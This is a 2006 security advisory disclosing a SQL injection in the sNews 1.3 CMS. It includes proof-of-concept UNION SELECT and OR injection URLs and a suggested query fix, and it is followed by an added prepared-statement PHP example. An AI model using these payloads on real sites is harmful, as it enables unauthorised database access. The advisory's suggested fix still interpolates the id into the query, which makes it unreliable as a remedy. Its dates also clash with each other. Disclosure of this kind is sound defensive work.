
Be-Paranoid.net

Be-Paranoid Advisory - 0001

Known since:
Discoverer
Category
CVE
Classification
Versions

Description

Quote:


Name: Be-Paranoid Advisory - 0001
Date: Feb 2nd, 2006
Product: sNews v1.3 (Nov, 12th, 2005)
--------------------------------------------

Description:
------------

sNews, a cool, tiny CMS, is affected by a SQL injection attack. An attacker may gain access to data in the database.

Proof Of Concept:
-----------------

The following URLs are not filtered on line 301:

$Domain/sNews/index.php?id=2+UNION+SELECT+test,test,test,test,test,test,test,test,test,test,test FROM test_table
$Domain/sNews/index.php?id=2+UNION+SELECT+USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER()
$Domain/sNews/index.php?id=2+OR+image+=+0

Line 301:
$query = "SELECT * FROM " .s('prefix'). "articles WHERE id = $id";

There may exist other injections.

An unpublished article may also be shown:

$Domain/sNews/index.php?id=x

Vulnerable Versions:
--------------------

- sNews 1.3
- sNews 1.2 (line 41; functions.php)

Solutions:
----------

There is no patch available yet. It seems that the problems will be fixed in 1.4. 1.4 beta is not affected.

You should change line 301 to:
$query = "SELECT * FROM `articles` LEFT OUTER JOIN categories ON(categories.id=articles.category) WHERE articles.id='$id' AND (articles.category = 0 OR categories.published = 1)";
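As an added example (not from the advisory and not sNews project code), the same lookup written with a PDO prepared statement so the id is never interpolated into the SQL; it assumes a `$pdo` connection, applies the `s('prefix')` value to both tables, and keeps the published/category condition of the suggested fix:

```php
<?php
// Added example, not sNews code: hardened replacement for the article lookup on line 301.
// Assumes a PDO connection $pdo and that the table prefix is the value of s('prefix').
function fetchPublishedArticle(PDO $pdo, string $prefix, $rawId): ?array
{
    // 1. Type validation: the id must be a positive integer, so payloads such as
    //    "2 UNION SELECT ..." or "2 OR image = 0" are rejected before any SQL is built.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // treat as "not found"; never echo the raw value back to the client
    }

    // 2. The prefix is configuration, not user input, but restrict it to identifier
    //    characters anyway because it is the only value spliced into the statement text.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    // 3. Bind the id as a parameter instead of interpolating it, and keep the
    //    published/category check so unpublished articles are not returned.
    $sql = "SELECT a.* FROM `{$prefix}articles` a "
         . "LEFT OUTER JOIN `{$prefix}categories` c ON c.id = a.category "
         . "WHERE a.id = :id AND (a.category = 0 OR c.published = 1)";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

Set `PDO::ATTR_EMULATE_PREPARES` to `false` on the connection so the server, not the driver, handles the parameter binding.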

Events:
-------

- 2006-02-12: Vulnerability discovered.
- 2006-02-13: Vendor contacted.

Credits:
--------

- The Author
- http://be-paranoid.net

PS:
---

This problem has already been discovered by r0t and it's described in CVE-2005-3853 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3853). Damn, I'm too late.

No exploit is available.

Versions

Sources